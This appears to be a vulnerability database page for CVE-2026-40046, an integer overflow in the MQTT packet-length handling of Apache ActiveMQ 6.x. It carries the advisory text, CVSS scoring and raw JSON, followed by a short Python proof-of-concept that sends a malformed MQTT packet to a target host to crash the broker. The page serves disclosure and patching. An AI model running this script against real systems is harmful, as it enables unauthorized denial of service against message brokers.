Security Vulnerability Report
中文
CVE-2026-40046 CVSS 7.5 HIGH

CVE-2026-40046

Published: 2026-04-09 17:16:32
Last Modified: 2026-04-13 15:02:28
Source: [email protected]

Description

Integer Overflow or Wraparound vulnerability in Apache ActiveMQ, Apache ActiveMQ All, Apache ActiveMQ MQTT. The fix for "CVE-2025-66168: MQTT control packet remaining length field is not properly validated" was only applied to 5.19.2 (and future 5.19.x) releases but was missed for all 6.0.0+ versions. This issue affects Apache ActiveMQ: from 6.0.0 before 6.2.4; Apache ActiveMQ All: from 6.0.0 before 6.2.4; Apache ActiveMQ MQTT: from 6.0.0 before 6.2.4. Users are recommended to upgrade to version 6.2.4 or a 5.19.x version starting with 5.19.2 or later (currently latest is 5.19.5), which fixes the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Apache ActiveMQ 6.0.0 至 6.2.4 之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-40046 (Apache ActiveMQ Integer Overflow) # This script sends a malformed MQTT packet with a specific Remaining Length to trigger the overflow. import socket def send_malformed_mqtt(host, port=1883): # MQTT Fixed Header: Packet Type (1) + Flags (0) = 0x10 # Remaining Length: 0xFF 0xFF 0xFF 0x7F (Max value, may trigger overflow/wraparound depending on implementation) payload = b"\x10" + b"\xff\xff\xff\x7f" + b"A" * 100 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((host, port)) s.send(payload) print(f"[+] Payload sent to {host}:{port}") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python3 poc.py <target_ip>") else: send_malformed_mqtt(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40046", "sourceIdentifier": "[email protected]", "published": "2026-04-09T17:16:31.650", "lastModified": "2026-04-13T15:02:27.760", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Integer Overflow or Wraparound vulnerability in Apache ActiveMQ, Apache ActiveMQ All, Apache ActiveMQ MQTT.\n\nThe fix for \"CVE-2025-66168: MQTT control packet remaining length field is not properly validated\" was only applied to 5.19.2 (and future 5.19.x) releases but was missed for all 6.0.0+ versions.\n\n\nThis issue affects Apache ActiveMQ: from 6.0.0 before 6.2.4; Apache ActiveMQ All: from 6.0.0 before 6.2.4; Apache ActiveMQ MQTT: from 6.0.0 before 6.2.4.\n\n\n\nUsers are recommended to upgrade to version 6.2.4 or a 5.19.x version starting with 5.19.2 or later (currently latest is 5.19.5), which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://activemq.apache.org/security-advisories.data/CVE-2026-40046-announcement.txt", "source": "[email protected]"}, {"url": "https://lists.apache.org/thread/zdntj5rcgjjzrpow84o339lzldy68zrg", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-66168", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.